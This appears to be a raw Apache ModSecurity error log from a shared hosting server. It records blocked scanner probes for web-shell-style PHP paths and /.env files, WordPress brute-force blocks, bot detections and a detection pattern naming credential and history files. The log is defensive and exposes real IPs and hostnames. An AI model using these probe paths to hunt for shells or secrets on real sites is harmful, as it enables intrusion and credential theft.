[Tue May 26 13:19:23.817902 2026] [security2:error] [pid 501489:tid 501715] [client 74.249.173.207:4113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/ioxi-o.php"] [unique_id "ahVQg2kFNZ9cRlz80IjggwAAAOQ"]
[Tue May 26 13:19:26.674643 2026] [security2:error] [pid 501489:tid 501673] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQhmkFNZ9cRlz80IjgxwAAALo"]
[Tue May 26 13:19:28.190323 2026] [security2:error] [pid 501489:tid 501666] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQh2kFNZ9cRlz80Ijg9QAAALM"]
[Tue May 26 13:19:28.564035 2026] [security2:error] [pid 501489:tid 501646] [client 74.249.173.207:4127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/function/function.php"] [unique_id "ahVQiGkFNZ9cRlz80IjhDQAAAJ8"]
[Tue May 26 13:19:30.200403 2026] [security2:error] [pid 501489:tid 501702] [client 14.181.201.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQiWkFNZ9cRlz80IjhKAAAANc"]
[Tue May 26 13:19:30.841472 2026] [security2:error] [pid 501489:tid 501661] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQimkFNZ9cRlz80IjhPgAAAK4"]
[Tue May 26 13:19:32.342034 2026] [security2:error] [pid 501489:tid 501622] [client 74.249.173.207:4122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/rip.php"] [unique_id "ahVQjGkFNZ9cRlz80IjhcAAAAIg"]
[Tue May 26 13:19:32.961130 2026] [security2:error] [pid 501489:tid 501655] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQjGkFNZ9cRlz80IjhcwAAAKg"]
[Tue May 26 13:19:35.438981 2026] [security2:error] [pid 501489:tid 501642] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQj2kFNZ9cRlz80IjhpwAAAJw"]
[Tue May 26 13:19:35.503504 2026] [security2:error] [pid 501489:tid 501686] [client 74.249.173.207:4114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/admin.php"] [unique_id "ahVQj2kFNZ9cRlz80IjhuQAAAMc"]
[Tue May 26 13:19:37.181971 2026] [security2:error] [pid 501489:tid 501707] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQkGkFNZ9cRlz80Ijh2QAAANw"]
[Tue May 26 13:19:40.085753 2026] [security2:error] [pid 501489:tid 501642] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQk2kFNZ9cRlz80IjiKwAAAJw"]
[Tue May 26 13:19:40.138140 2026] [security2:error] [pid 501489:tid 501734] [client 74.249.173.207:4106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVQlGkFNZ9cRlz80IjiOwAAAPQ"]
[Tue May 26 13:19:43.062713 2026] [autoindex:error] [pid 501489:tid 501630] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.gldmarsa.com/
[Tue May 26 13:19:44.950091 2026] [security2:error] [pid 501489:tid 501694] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQmGkFNZ9cRlz80Iji0gAAAM8"]
[Tue May 26 13:19:45.115490 2026] [security2:error] [pid 501489:tid 501718] [client 176.65.139.237:62726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.redstudio.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQmWkFNZ9cRlz80Iji4wAAAOc"]
[Tue May 26 13:19:45.118774 2026] [security2:error] [pid 501489:tid 501725] [client 176.65.139.238:24258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.alpimentel.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQmWkFNZ9cRlz80Iji5QAAAO0"]
[Tue May 26 13:19:45.119437 2026] [security2:error] [pid 501489:tid 501638] [client 176.65.139.232:42232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.redstudioanima.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQmWkFNZ9cRlz80Iji5AAAAJg"]
[Tue May 26 13:19:45.122944 2026] [security2:error] [pid 501489:tid 501713] [client 176.65.139.238:24274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQmWkFNZ9cRlz80Iji5gAAAOI"]
[Tue May 26 13:19:45.128000 2026] [security2:error] [pid 501489:tid 501674] [client 176.65.139.237:62742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.o2plus.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQmWkFNZ9cRlz80Iji5wAAALs"]
[Tue May 26 13:19:45.146980 2026] [security2:error] [pid 501489:tid 501622] [client 176.65.139.231:56838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.levantefilmes.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQmWkFNZ9cRlz80Iji6gAAAIg"]
[Tue May 26 13:19:45.289772 2026] [security2:error] [pid 501489:tid 501518] [remote 173.249.21.166:47884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVQmWkFNZ9cRlz80Iji4AAAyhw"]
[Tue May 26 13:19:46.277611 2026] [autoindex:error] [pid 501489:tid 501667] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.glorodbalsa.com/
[Tue May 26 13:19:46.642177 2026] [security2:error] [pid 501489:tid 501644] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQmmkFNZ9cRlz80IjjFAAAAJ4"]
[Tue May 26 13:19:48.984944 2026] [proxy:error] [pid 501489:tid 501671] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:19:48.985013 2026] [proxy_http:error] [pid 501489:tid 501671] [client 198.235.24.220:57546] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:19:48.985611 2026] [proxy:error] [pid 501489:tid 501671] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:19:48.985667 2026] [proxy_http:error] [pid 501489:tid 501671] [client 198.235.24.220:57546] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:19:49.552532 2026] [security2:error] [pid 501489:tid 501705] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQnWkFNZ9cRlz80IjjWQAAANo"]
[Tue May 26 13:19:51.026386 2026] [security2:error] [pid 501489:tid 501653] [client 74.7.241.132:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahVQn2kFNZ9cRlz80IjjhwAAAKY"]
[Tue May 26 13:19:51.026983 2026] [security2:error] [pid 501489:tid 501715] [client 74.7.241.132:34370] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahVQn2kFNZ9cRlz80IjjhQAA5Bs"]
[Tue May 26 13:19:51.782585 2026] [security2:error] [pid 501489:tid 501641] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQn2kFNZ9cRlz80IjjjQAAAJs"]
[Tue May 26 13:19:51.914973 2026] [security2:error] [pid 501489:tid 501680] [client 121.237.36.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVQn2kFNZ9cRlz80IjjmQAAAME"]
[Tue May 26 13:19:51.987603 2026] [security2:error] [pid 501489:tid 501668] [client 74.7.175.188:36632] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahVQn2kFNZ9cRlz80IjjnQAAALU"]
[Tue May 26 13:19:52.410318 2026] [security2:error] [pid 501489:tid 501725] [client 74.249.173.207:4101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/cache.php"] [unique_id "ahVQoGkFNZ9cRlz80IjjoQAAAO0"]
[Tue May 26 13:19:53.690040 2026] [security2:error] [pid 501489:tid 501558] [remote 74.7.241.58:54246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVQoWkFNZ9cRlz80IjjyQAAl0Q"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:19:54.403862 2026] [security2:error] [pid 501489:tid 501689] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQoWkFNZ9cRlz80Ijj0QAAAMo"]
[Tue May 26 13:19:56.193174 2026] [security2:error] [pid 501489:tid 501629] [client 113.172.245.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQo2kFNZ9cRlz80IjkBAAAAI8"]
[Tue May 26 13:19:56.680188 2026] [security2:error] [pid 501489:tid 501738] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQpGkFNZ9cRlz80IjkEAAAAPc"]
[Tue May 26 13:19:56.936648 2026] [security2:error] [pid 501489:tid 501734] [client 203.188.183.143:7636] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.199.245"] [uri "/index.cgi"] [unique_id "ahVQpGkFNZ9cRlz80IjkHQAAAPQ"]
[Tue May 26 13:19:56.999816 2026] [security2:error] [pid 501489:tid 501750] [client 74.249.173.207:4748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/themes.php"] [unique_id "ahVQpGkFNZ9cRlz80IjkJAAAAQM"]
[Tue May 26 13:19:58.551967 2026] [security2:error] [pid 501489:tid 501731] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQpmkFNZ9cRlz80IjkRAAAAPE"]
[Tue May 26 13:19:59.513950 2026] [security2:error] [pid 501489:tid 501745] [client 5.255.231.194:52492] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVQp2kFNZ9cRlz80IjkYQAAAP4"]
[Tue May 26 13:20:01.281502 2026] [security2:error] [pid 501489:tid 501716] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQqGkFNZ9cRlz80IjkiAAAAOU"]
[Tue May 26 13:20:03.121548 2026] [security2:error] [pid 501489:tid 501628] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQqmkFNZ9cRlz80IjksQAAAI4"]
[Tue May 26 13:20:03.887987 2026] [security2:error] [pid 501489:tid 501566] [remote 54.38.29.86:40010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVQq2kFNZ9cRlz80IjkwQAAukw"]
[Tue May 26 13:20:05.131850 2026] [core:error] [pid 501489:tid 501702] [client 142.93.69.125:56588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:20:05.131876 2026] [core:error] [pid 501489:tid 501702] [client 142.93.69.125:56588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:20:05.953985 2026] [security2:error] [pid 501489:tid 501692] [client 74.249.173.207:4739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/an.php"] [unique_id "ahVQrWkFNZ9cRlz80Ijk_AAAAM0"]
[Tue May 26 13:20:06.049641 2026] [security2:error] [pid 501489:tid 501712] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQrWkFNZ9cRlz80Ijk8wAAAOE"]
[Tue May 26 13:20:07.236510 2026] [security2:error] [pid 501489:tid 501696] [client 195.133.24.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVQrWkFNZ9cRlz80Ijk6wAAANE"], referer: http://christinaspromotions.com/my-front-page/imac-606765_1280/
[Tue May 26 13:20:07.729496 2026] [security2:error] [pid 501489:tid 501688] [client 104.28.71.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVQr2kFNZ9cRlz80IjlIAAAAMk"]
[Tue May 26 13:20:08.297311 2026] [security2:error] [pid 501489:tid 501701] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQr2kFNZ9cRlz80IjlMAAAANY"]
[Tue May 26 13:20:08.774720 2026] [security2:error] [pid 501489:tid 501699] [client 74.249.173.207:4756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index/function.php"] [unique_id "ahVQsGkFNZ9cRlz80IjlRAAAANQ"]
[Tue May 26 13:20:10.723183 2026] [security2:error] [pid 501489:tid 501632] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQsmkFNZ9cRlz80IjlawAAAJI"]
[Tue May 26 13:20:11.038648 2026] [security2:error] [pid 501489:tid 501700] [client 47.128.37.210:36586] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahVQs2kFNZ9cRlz80IjlfQAAANU"]
[Tue May 26 13:20:11.101157 2026] [security2:error] [pid 501489:tid 501674] [client 185.191.171.1:61610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVQs2kFNZ9cRlz80IjlfgAAALs"]
[Tue May 26 13:20:11.101303 2026] [security2:error] [pid 501489:tid 501674] [client 185.191.171.1:61610] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVQs2kFNZ9cRlz80IjlfgAAALs"]
[Tue May 26 13:20:11.409873 2026] [security2:error] [pid 501489:tid 501693] [client 185.191.171.8:35950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVQs2kFNZ9cRlz80IjlhgAAAM4"]
[Tue May 26 13:20:11.410080 2026] [security2:error] [pid 501489:tid 501693] [client 185.191.171.8:35950] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVQs2kFNZ9cRlz80IjlhgAAAM4"]
[Tue May 26 13:20:12.151230 2026] [security2:error] [pid 501489:tid 501747] [client 74.249.173.207:4759] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVQsmkFNZ9cRlz80IjlfAAAAQA"]
[Tue May 26 13:20:12.277129 2026] [security2:error] [pid 501489:tid 501714] [client 74.249.173.207:4759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/ws.php"] [unique_id "ahVQtGkFNZ9cRlz80IjlpwAAAOM"]
